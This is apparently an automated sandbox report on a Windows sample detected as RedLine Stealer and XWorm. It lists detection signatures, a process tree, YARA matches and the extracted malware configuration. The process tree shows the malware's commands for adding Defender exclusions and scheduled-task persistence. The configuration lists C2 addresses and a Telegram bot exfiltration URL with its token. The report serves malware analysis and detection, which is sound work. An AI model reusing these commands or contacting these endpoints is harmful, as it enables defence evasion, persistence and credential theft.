Edit tour

Windows Analysis Report
Output.exe

Overview

General Information

Sample name:	Output.exe
Analysis ID:	1430686
MD5:	edd7441051bbf509ef1052d9f2a02c8f
SHA1:	7338ef9ddb0b59228b31c6b7931fae04ace344e8
SHA256:	500b51771f03e61f1c46fc29c2a786201c123ae5f0369bd1664992bd7c434a30
Tags:	exe
Infos:

Detection

RedLine, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected RedLine Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Connects to many ports of the same IP (likely port scanning)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Output.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\Output.exe" MD5: EDD7441051BBF509EF1052D9F2A02C8F)

XClient.exe (PID: 7468 cmdline: "C:\ProgramData\XClient.exe" MD5: 5B7AC9829CDCA0B5E82604191DCC1D4E)

powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2984 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

build.exe (PID: 7492 cmdline: "C:\ProgramData\build.exe" MD5: D32BDDD3639F42733A78945885002128)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mstc.exe (PID: 5508 cmdline: C:\Users\user\AppData\Local\Temp\mstc.exe MD5: 5B7AC9829CDCA0B5E82604191DCC1D4E)

mstc.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Temp\mstc.exe" MD5: 5B7AC9829CDCA0B5E82604191DCC1D4E)

mstc.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Local\Temp\mstc.exe" MD5: 5B7AC9829CDCA0B5E82604191DCC1D4E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "91.92.252.220"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "mstc.exe", "Version": "XWorm V5.3", "Telegram URL": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672"}

Threatname: RedLine

{"C2 url": ["91.92.252.220:9078"], "Bot Id": "IDS"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\build.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\ProgramData\build.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\ProgramData\build.exe	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
C:\ProgramData\build.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
C:\Users\user\AppData\Local\Temp\mstc.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\mstc.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\mstc.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\mstc.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\mstc.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf1e8:$s6: VirtualBox 0xf146:$s8: Win32_ComputerSystem 0x1251b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x125b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x126cd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10971:$cnc4: POST / HTTP/1.1
C:\ProgramData\XClient.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\ProgramData\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\XClient.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\XClient.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\ProgramData\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf1e8:$s6: VirtualBox 0xf146:$s8: Win32_ComputerSystem 0x1251b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x125b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x126cd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10971:$cnc4: POST / HTTP/1.1
Click to see the 9 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2585450577.00000000029F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x2ced2:$a4: get_ScannedWallets 0x44d1a:$a4: get_ScannedWallets 0x2bd30:$a5: get_ScanTelegram 0x43b78:$a5: get_ScanTelegram 0x2cb56:$a6: get_ScanGeckoBrowsersPaths 0x4499e:$a6: get_ScanGeckoBrowsersPaths 0x2a972:$a7: <Processes>k__BackingField 0x427ba:$a7: <Processes>k__BackingField 0x28884:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x406cc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2a2a6:$a9: <ScanFTP>k__BackingField 0x420ee:$a9: <ScanFTP>k__BackingField
00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xefe8:$s6: VirtualBox 0xef46:$s8: Win32_ComputerSystem 0x1231b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x123b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x124cd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10771:$cnc4: POST / HTTP/1.1
00000002.00000002.2585450577.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.2585450577.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1fc60:$s6: VirtualBox 0x1fbbe:$s8: Win32_ComputerSystem 0x22f93:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x23030:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x23145:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x213e9:$cnc4: POST / HTTP/1.1
Process Memory Space: Output.exe PID: 7392	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Output.exe PID: 7392	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: Output.exe PID: 7392	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x13e4d:$a4: get_ScannedWallets 0x12cf4:$a5: get_ScanTelegram 0x13ad6:$a6: get_ScanGeckoBrowsersPaths 0x11987:$a7: <Processes>k__BackingField 0xeeba:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x112bb:$a9: <ScanFTP>k__BackingField
Process Memory Space: XClient.exe PID: 7468	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: XClient.exe PID: 7468	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: build.exe PID: 7492	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build.exe PID: 7492	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: build.exe PID: 7492	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x15360:$a4: get_ScannedWallets 0x14207:$a5: get_ScanTelegram 0x14fe9:$a6: get_ScanGeckoBrowsersPaths 0x12e9a:$a7: <Processes>k__BackingField 0x103cd:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x127ce:$a9: <ScanFTP>k__BackingField
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.build.exe.340000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.build.exe.340000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.0.build.exe.340000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
3.0.build.exe.340000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
1.2.Output.exe.12459750.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Output.exe.12459750.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.Output.exe.12459750.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Output.exe.12459750.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.Output.exe.12459750.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
1.2.Output.exe.12459750.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
1.2.Output.exe.12459750.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
1.2.Output.exe.12459750.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
1.2.Output.exe.12441908.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Output.exe.12441908.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.Output.exe.12441908.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
1.2.Output.exe.12441908.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
2.0.XClient.exe.7b0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.0.XClient.exe.7b0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.0.XClient.exe.7b0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.0.XClient.exe.7b0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf1e8:$s6: VirtualBox 0xf146:$s8: Win32_ComputerSystem 0x1251b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x125b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x126cd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10971:$cnc4: POST / HTTP/1.1
2.2.XClient.exe.12971a78.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.XClient.exe.12971a78.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.XClient.exe.12971a78.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xd3e8:$s6: VirtualBox 0xd346:$s8: Win32_ComputerSystem 0x1071b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x107b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x108cd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xeb71:$cnc4: POST / HTTP/1.1
1.2.Output.exe.12441908.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Output.exe.12441908.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.Output.exe.12441908.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b412:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a270:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b096:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28eb2:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26dc4:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287e6:$a9: <ScanFTP>k__BackingField
1.2.Output.exe.12441908.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282d2:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b989:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f78:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2aec1:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x284d3:$v2_2: get_ScanVPN 0x28576:$v2_2: get_ScanFTP
2.2.XClient.exe.12971a78.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.XClient.exe.12971a78.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.XClient.exe.12971a78.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.XClient.exe.12971a78.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf1e8:$s6: VirtualBox 0xf146:$s8: Win32_ComputerSystem 0x1251b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x125b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x126cd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10971:$cnc4: POST / HTTP/1.1
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

